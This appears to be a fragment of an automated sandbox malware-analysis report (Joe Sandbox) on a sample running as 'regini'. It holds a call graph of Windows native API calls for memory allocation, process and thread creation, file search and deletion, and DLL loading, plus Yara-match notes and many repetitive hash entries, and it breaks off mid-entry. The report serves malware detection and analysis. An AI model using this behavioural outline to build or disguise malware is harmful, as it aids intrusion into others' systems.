97065->97066 97067 93b860 RtlAllocateHeap 97066->97067 97068 921d7a 97067->97068 97069 93b860 RtlAllocateHeap 97068->97069 97070 921d8b 97069->97070 97076 921e22 97070->97076 97092 926d50 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 97070->97092 97072 924880 2 API calls 97073 921fd2 97072->97073 97088 938170 97073->97088 97075->97049 97076->97072 97078 9281dc 97077->97078 97079 9280a0 2 API calls 97078->97079 97080 9281ff 97079->97080 97081 928221 97080->97081 97082 928209 97080->97082 97084 92823d 97081->97084 97086 9396e0 NtClose 97081->97086 97083 928214 97082->97083 97085 9396e0 NtClose 97082->97085 97083->97064 97084->97064 97085->97083 97087 928233 97086->97087 97087->97064 97089 9381d2 97088->97089 97091 9381df 97089->97091 97093 922040 97089->97093 97091->97075 97092->97076 97094 92204a 97093->97094 97110 928480 97094->97110 97096 922060 97103 9225b3 97096->97103 97114 9313a0 97096->97114 97099 922275 97122 93c950 97099->97122 97100 9220bb 97100->97103 97117 93c820 97100->97117 97103->97091 97104 92228a 97106 9222d7 97104->97106 97128 920b80 97104->97128 97106->97103 97107 920b80 LdrInitializeThunk 97106->97107 97131 928420 97106->97131 97107->97106 97108 928420 LdrInitializeThunk 97109 922425 97108->97109 97109->97106 97109->97108 97111 92848d 97110->97111 97112 9284b5 97111->97112 97113 9284ae SetErrorMode 97111->97113 97112->97096 97113->97112 97115 93b6f0 NtAllocateVirtualMemory 97114->97115 97116 9313c1 97115->97116 97116->97100 97118 93c830 97117->97118 97119 93c836 97117->97119 97118->97099 97120 93b860 RtlAllocateHeap 97119->97120 97121 93c85c 97120->97121 97121->97099 97123 93c8c0 97122->97123 97124 93b860 RtlAllocateHeap 97123->97124 97125 93c91d 97123->97125 97126 93c8fa 97124->97126 97125->97104 97127 93b780 RtlFreeHeap 97126->97127 97127->97125 97135 939970 97128->97135 97132 928433 97131->97132 97140 938c30 97132->97140 97134 92845e 97134->97106 97136 93998d 97135->97136 97139 34b2c70 LdrInitializeThunk 97136->97139 97137 
920ba2 97137->97109 97139->97137 97141 938ca8 97140->97141 97142 938c58 97140->97142 97145 34b2dd0 LdrInitializeThunk 97141->97145 97142->97134 97143 938ccd 97143->97134 97145->97143 97146 9270c0 97147 9270ea 97146->97147 97150 928250 97147->97150 97149 927114 97151 92826d 97150->97151 97157 938e20 97151->97157 97153 9282bd 97154 9282c4 97153->97154 97162 938f00 97153->97162 97154->97149 97156 9282ed 97156->97149 97158 938eb5 97157->97158 97160 938e48 97157->97160 97167 34b2f30 LdrInitializeThunk 97158->97167 97159 938eee 97159->97153 97160->97153 97163 938faa 97162->97163 97164 938f2b 97162->97164 97168 34b2d10 LdrInitializeThunk 97163->97168 97164->97156 97165 938fef 97165->97156 97167->97159 97168->97165 97169 927640 97170 927658 97169->97170 97172 9276b2 97169->97172 97170->97172 97173 92b560 97170->97173 97175 92b586 97173->97175 97174 92b7b9 97174->97172 97175->97174 97200 939ae0 97175->97200 97177 92b5fc 97177->97174 97178 93c950 2 API calls 97177->97178 97179 92b61b 97178->97179 97179->97174 97180 938d30 LdrInitializeThunk 97179->97180 97181 92b6f2 97179->97181 97183 92b67d 97180->97183 97182 925e60 LdrInitializeThunk 97181->97182 97184 92b711 97181->97184 97182->97184 97183->97181 97187 92b686 97183->97187 97188 92b7a1 97184->97188 97206 9388a0 97184->97206 97185 92b6da 97189 928420 LdrInitializeThunk 97185->97189 97186 92b6b8 97221 9349b0 LdrInitializeThunk 97186->97221 97187->97174 97187->97185 97187->97186 97203 925e60 97187->97203 97194 928420 LdrInitializeThunk 97188->97194 97193 92b6e8 97189->97193 97193->97172 97196 92b7af 97194->97196 97195 92b778 97211 938950 97195->97211 97196->97172 97198 92b792 97216 938ab0 97198->97216 97201 939afa 97200->97201 97202 939b0b CreateProcessInternalW 97201->97202 97202->97177 97204 938f00 LdrInitializeThunk 97203->97204 97205 925e9e 97203->97205 97204->97205 97205->97186 97207 938917 97206->97207 97208 9388c8 97206->97208 97222 34b39b0 LdrInitializeThunk 97207->97222 97208->97195 97209 93893c 97209->97195 97212 
9389c7 97211->97212 97213 938978 97211->97213 97223 34b4340 LdrInitializeThunk 97212->97223 97213->97198 97214 9389ec 97214->97198 97217 938b27 97216->97217 97219 938ad8 97216->97219 97224 34b2fb0 LdrInitializeThunk 97217->97224 97218 938b4c 97218->97188 97219->97188 97221->97185 97222->97209 97223->97214 97224->97218 96782 93c880 96785 93b780 96782->96785 96788 939a50 96785->96788 96787 93b799 96789 939a6d 96788->96789 96790 939a7e RtlFreeHeap 96789->96790 96790->96787 97225 939640 97226 939668 97225->97226 97227 9396b1 97225->97227 97228 9396c7 NtDeleteFile 97227->97228 97229 928b47 97230 928b4a 97229->97230 97231 928b01 97230->97231 97233 9273e0 97230->97233 97234 9273f6 97233->97234 97236 92742f 97233->97236 97234->97236 97237 927250 LdrLoadDll LdrLoadDll 97234->97237 97236->97231 97237->97236 97238 929f45 97239 929f50 97238->97239 97240 929f79 97239->97240 97241 93b780 RtlFreeHeap 97239->97241 97241->97240 96796 34b2ad0 LdrInitializeThunk 96797 923433 96802 9280a0 96797->96802 96801 92345f 96803 9280ba 96802->96803 96807 923443 96802->96807 96811 938dd0 96803->96811 96806 9396e0 NtClose 96806->96807 96807->96801 96808 9396e0 96807->96808 96809 9396fd 96808->96809 96810 93970e NtClose 96809->96810 96810->96801 96812 938dea 96811->96812 96815 34b35c0 LdrInitializeThunk 96812->96815 96813 92818a 96813->96806 96815->96813 97252 9393f0 97253 9394a1 97252->97253 97255 93941c 97252->97255 97254 9394b7 NtCreateFile 97253->97254 96818 91b820 96821 93b6f0 96818->96821 96820 91ce91 96824 939850 96821->96824 96823 93b721 96823->96820 96825 9398df 96824->96825 96827 939878 96824->96827 96826 9398f5 NtAllocateVirtualMemory 96825->96826 96826->96823 96827->96823 97256 919de0 97258 919def 97256->97258 97257 919e30 97258->97257 97259 919e1d CreateThread 97258->97259 97260 9210e0 97261 9210f9 97260->97261 97262 924880 2 API calls 97261->97262 97263 921117 97262->97263 97264 921163 97263->97264 97265 921150 PostThreadMessageW 97263->97265 97265->97264 97266 927460 97267 92747c 
97266->97267 97271 9274cf 97266->97271 97269 9396e0 NtClose 97267->97269 97267->97271 97268 927607 97270 927497 97269->97270 97276 926880 NtClose LdrInitializeThunk LdrInitializeThunk 97270->97276 97271->97268 97277 926880 NtClose LdrInitializeThunk LdrInitializeThunk 97271->97277 97273 9275e1 97273->97268 97278 926a50 NtClose LdrInitializeThunk LdrInitializeThunk 97273->97278 97276->97271 97277->97273 97278->97268 96828 9362a0 96829 9362fa 96828->96829 96831 936307 96829->96831 96832 933cb0 96829->96832 96833 93b6f0 NtAllocateVirtualMemory 96832->96833 96835 933cf1 96833->96835 96834 933dfe 96834->96831 96835->96834 96836 924880 2 API calls 96835->96836 96838 933d37 96836->96838 96837 933d80 Sleep 96837->96838 96838->96834 96838->96837 97279 938ce0 97280 938cfd 97279->97280 97283 34b2df0 LdrInitializeThunk 97280->97283 97281 938d25 97283->97281 97284 938b60 97285 938bec 97284->97285 97287 938b8b 97284->97287 97289 34b2ee0 LdrInitializeThunk 97285->97289 97286 938c1d 97289->97286 97290 931d60 97295 931d79 97290->97295 97291 931e0c 97292 931dc4 97293 93b780 RtlFreeHeap 97292->97293 97294 931dd4 97293->97294 97295->97291 97295->97292 97296 931e07 97295->97296 97297 93b780 RtlFreeHeap 97296->97297 97297->97291 97298 925f66 97299 925f09 97298->97299 97300 925f10 97299->97300 97301 928420 LdrInitializeThunk 97299->97301 97303 925f3c 97300->97303 97304 9283a0 97300->97304 97301->97300 97305 9283e4 97304->97305 97306 928405 97305->97306 97311 938a00 97305->97311 97306->97300 97308 9283f5 97309 928411 97308->97309 97310 9396e0 NtClose 97308->97310 97309->97300 97310->97306 97312 938a7a 97311->97312 97314 938a2b 97311->97314 97316 34b4650 LdrInitializeThunk 97312->97316 97313 938a9f 97313->97308 97314->97308 97316->97313 96840 922aaf 96841 922ac2 96840->96841 96844 9265f0 96841->96844 96843 922aca 96845 926623 96844->96845 96846 926647 96845->96846 96851 939250 96845->96851 96846->96843 96848 92666a 96848->96846 96849 9396e0 NtClose 96848->96849 96850 9266ec 96849->96850 
96850->96843 96852 93926d 96851->96852 96855 34b2ca0 LdrInitializeThunk 96852->96855 96853 939299 96853->96848 96855->96853

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: "$%$&f$.@$<|$?:$F$I>$V.$W$X}$bG$dg$e%V.$hr$jO$p4$v${${P${]$~$h
                                                                  • API String ID: 0-844827240
                                                                  • Opcode ID: 60815bb0888396476b73bf4b146bafff3167661b62b1152055b27adf33387a55
                                                                  • Instruction ID: cda5a7e16ad10835b6bb9846d5de687d6cf8c953ea23c616ff9a8328ec693ea3
                                                                  • Opcode Fuzzy Hash: 60815bb0888396476b73bf4b146bafff3167661b62b1152055b27adf33387a55
                                                                  • Instruction Fuzzy Hash: C62279B0E06229CBEB24CF45C998BDDBBB1BB44308F1086D9D0596B280D7B95EC9DF51
                                                                  APIs
                                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 0092C9B4
                                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 0092C9EF
                                                                  • FindClose.KERNELBASE(?), ref: 0092C9FA
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstNext
                                                                  • String ID:
                                                                  • API String ID: 3541575487-0
                                                                  • Opcode ID: 3e55da1cfd8cad6bbb757cd532cfe8eb3c10e6acfd91596a3322c7845f83d105
                                                                  • Instruction ID: 633fdd4593332bd030e373b47096136e01c792fbcf35693c1f24bdb71486f74d
                                                                  • Opcode Fuzzy Hash: 3e55da1cfd8cad6bbb757cd532cfe8eb3c10e6acfd91596a3322c7845f83d105
                                                                  • Instruction Fuzzy Hash: 283181B6A00318BBDB20DFA4DC86FFF777C9F84745F104558B909A6180DB74AA85CBA1
                                                                  APIs
                                                                  • NtCreateFile.NTDLL(?,24064BBE,?,?,?,?,?,?,?,?,?), ref: 009394E8
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 89953b318f57b8eeb3b94e37ccb434cef16c25349bd0a665c16f5a89a13f60d4
                                                                  • Instruction ID: 87ac78cf1ae8d6f63eaaadd8b7b22cf60fa84944d90901a58fe833da7f848659
                                                                  • Opcode Fuzzy Hash: 89953b318f57b8eeb3b94e37ccb434cef16c25349bd0a665c16f5a89a13f60d4
                                                                  • Instruction Fuzzy Hash: A331B3B5A01248ABDB14DF98D881EEFB7B9EF8C700F108219F919A7344D730A9518BA5
                                                                  APIs
                                                                  • NtReadFile.NTDLL(?,24064BBE,?,?,?,?,?,?,?), ref: 00939633
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: d010eacb628a258346aa53aefa1bed7b249c9d68a6701697dc2ea1d6fb028099
                                                                  • Instruction ID: 9afacb7ce5df2691fa83212368d10f746d1c5edf0358694624771dfe45a5476b
                                                                  • Opcode Fuzzy Hash: d010eacb628a258346aa53aefa1bed7b249c9d68a6701697dc2ea1d6fb028099
                                                                  • Instruction Fuzzy Hash: 7931E4B5A00208ABCB14DF98C881EEFB7B9EF88710F008209F919A7341D770A9518FA5
                                                                  APIs
                                                                  • NtAllocateVirtualMemory.NTDLL(009220BB,24064BBE,009381DF,00000000,00000004,00003000,?,?,?,?,?,009381DF,009220BB), ref: 00939912
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateMemoryVirtual
                                                                  • String ID:
                                                                  • API String ID: 2167126740-0
                                                                  • Opcode ID: cedafb1025b038325b921a273ed17e15dc8af73268ddac6631b876435128dcc7
                                                                  • Instruction ID: 35294c42c96459f681e64d0dc5e3b4d5c47444ddab15a9efb23b63f1e831cbc1
                                                                  • Opcode Fuzzy Hash: cedafb1025b038325b921a273ed17e15dc8af73268ddac6631b876435128dcc7
                                                                  • Instruction Fuzzy Hash: 322128B5A00248AFDB10DF98DC41FEFB7B9EF88700F008509FA18AB240D770A9118BA5
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DeleteFile
                                                                  • String ID:
                                                                  • API String ID: 4033686569-0
                                                                  • Opcode ID: e2871cfb3dc0ff402a426fcbebe61238aa19fe36c2eaceb1abd14c6b07a2ed57
                                                                  • Instruction ID: edf7f85857a054f16d1dc9df563bae807037df07395177b52127dff94c9fdb8c
                                                                  • Opcode Fuzzy Hash: e2871cfb3dc0ff402a426fcbebe61238aa19fe36c2eaceb1abd14c6b07a2ed57
                                                                  • Instruction Fuzzy Hash: 5F11AC71A012087BD620EBA4CC02FEF73ADEF85704F008149FA186B281E775B9118BE5
                                                                  APIs
                                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00939717
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_910000_regini.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                  • Instruction ID: 61e34e3081dabd8d3c8d14dbd5ae30e447e2a30e4d289001caa8cd3408f8a68f
                                                                  • Opcode Fuzzy Hash: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                  • Instruction Fuzzy Hash: D9E04636200214BBC220AA6ADC01FEB776CDFC6B10F118819FA89B7281C671BA1087F0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 315597fc52f11367ddedb0a798f7802be185d8b25d290f4fcf0453fb38c7ff63
                                                                  • Instruction ID: d63241a2a18aae7373b483b7c1a3fc93c6d21edbf596a3a91ed62631e2375831
                                                                  • Opcode Fuzzy Hash: 315597fc52f11367ddedb0a798f7802be185d8b25d290f4fcf0453fb38c7ff63
                                                                  • Instruction Fuzzy Hash: 89900235615844129180B15948845464005D7F0301B55C016E0424954C8B168A565365
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 351fec6fe3895cbe330068aa5ae1b892fac6927765cbb007e6e26103302b34c6
                                                                  • Instruction ID: 9b9a2e21730fc07f91e79bc385b7b080d14ee76abbd181e5c9ae828a9f952f60
                                                                  • Opcode Fuzzy Hash: 351fec6fe3895cbe330068aa5ae1b892fac6927765cbb007e6e26103302b34c6
                                                                  • Instruction Fuzzy Hash: 06900265611544424180B15948044066005D7F1301395C11AA0554960C871A8955926D
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: ba525b74b6ff394dc2a79de79d903b23298d614244ccbafdf1627ba02ccef37b
                                                                  • Instruction ID: 333f4155ea7d87c4d7e209d1a3297d70c7233d6824bc580103251f9ea9a8aa77
                                                                  • Opcode Fuzzy Hash: ba525b74b6ff394dc2a79de79d903b23298d614244ccbafdf1627ba02ccef37b
                                                                  • Instruction Fuzzy Hash: 3A900265212444034145B1594414616400AC7F0201B55C026E1014990DC72789916129
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 0797e1425330bd5b4e4d2565232113497a7d5c1e285f7739220333ce6e9294a5
                                                                  • Instruction ID: 396b6570f076104d5c1150ea48d56f7a7c2dc83594881e9c6741e6237db4f4f4
                                                                  • Opcode Fuzzy Hash: 0797e1425330bd5b4e4d2565232113497a7d5c1e285f7739220333ce6e9294a5
                                                                  • Instruction Fuzzy Hash: 0B90023521548C42D180B1594404A460015C7E0305F55C016A0064A94D97278E55B665
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: b1482f8eb6913c4d68f59a74fab97e4976e647e198e2818e2d8446a06440bfdb
                                                                  • Instruction ID: 4aee08b38c5292a68dcedade9ba2f6b520a9fe76b0acc18469d3a6998c6f55f2
                                                                  • Opcode Fuzzy Hash: b1482f8eb6913c4d68f59a74fab97e4976e647e198e2818e2d8446a06440bfdb
                                                                  • Instruction Fuzzy Hash: D590023521144C02D1C0B159440464A0005C7E1301F95C01AA0025A54DCB178B5977A5
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: dba21a004e4c367b19cf5d8cd1adc57ba913ac66894abb8abc22ac111762a21f
                                                                  • Instruction ID: fc6b4e8a745aaa074a5e03aad7a561231310bb6fa2572bba7574680ce270c2dc
                                                                  • Opcode Fuzzy Hash: dba21a004e4c367b19cf5d8cd1adc57ba913ac66894abb8abc22ac111762a21f
                                                                  • Instruction Fuzzy Hash: 7090023561544C02D190B15944147460005C7E0301F55C016A0024A54D87578B5576A5
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 447ac8ec10b720eb5c0152ab1f878957140b6b25f8ecc5562580064a7af9e052
                                                                  • Instruction ID: 6f24375ad71b8bb09f5621e4411e987967ad88284b8751e1ed4a74e38ed25cda
                                                                  • Opcode Fuzzy Hash: 447ac8ec10b720eb5c0152ab1f878957140b6b25f8ecc5562580064a7af9e052
                                                                  • Instruction Fuzzy Hash: 7990043D331444030145F55D07045070047C7F5351355C037F1015D50CD733CD715135
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: fc6cc4bda772e891550ea19ceccd6f75bbd7bd0015cb652df3eab438ba8cffd6
                                                                  • Instruction ID: a4d29bf28d3fbb100ce53a1a73fea5c5178d01811af8add5d67bd750196b01f5
                                                                  • Opcode Fuzzy Hash: fc6cc4bda772e891550ea19ceccd6f75bbd7bd0015cb652df3eab438ba8cffd6
                                                                  • Instruction Fuzzy Hash: C8900229231444020185F559060450B0445D7E6351395C01AF1416990CC72389655325
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 37ba4614777b7fd9514edec7783b28ac0d1a782a49119cf4dfcdfb0207c97161
                                                                  • Instruction ID: dce5be06f6cb8f0a850e932ba6e3aefcd5b80adb36bf84b21f4b1116e7e66232
                                                                  • Opcode Fuzzy Hash: 37ba4614777b7fd9514edec7783b28ac0d1a782a49119cf4dfcdfb0207c97161
                                                                  • Instruction Fuzzy Hash: 8C90026535144842D140B1594414B060005C7F1301F55C01AE1064954D871BCD52612A
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 333a0bf87c430d8cf079d8ac889b574ff1f6670af8f15424e7837949529a8d5e
                                                                  • Instruction ID: 2d6f5d2218bb898cab503d7c68505ad8d4a5a849be27ba0430a836edc195ea44
                                                                  • Opcode Fuzzy Hash: 333a0bf87c430d8cf079d8ac889b574ff1f6670af8f15424e7837949529a8d5e
                                                                  • Instruction Fuzzy Hash: 1F900225221C4442D240B5694C14B070005C7E0303F55C11AA0154954CCB1789615525
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3b22df54d4ca36482c57f85ce75d80f0f197b08e2a8bf0d10273ce6a52a41c2f
                                                                  • Instruction ID: 1a54008958dfa26193d1899c51ee1ef68a72d9a2de874db22dc53bc8cee1ed02
                                                                  • Opcode Fuzzy Hash: 3b22df54d4ca36482c57f85ce75d80f0f197b08e2a8bf0d10273ce6a52a41c2f
                                                                  • Instruction Fuzzy Hash: 7B900225611444424180B16988449064005EBF1211755C126A0998950D875B89655669
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                                  • Associated: 0000000D.00000002.3096790532.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_3440000_regini.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: bfccf9f350708c5971f7bcf0dd7e247cced89c6e3a08914fcafdb617e5e277c0
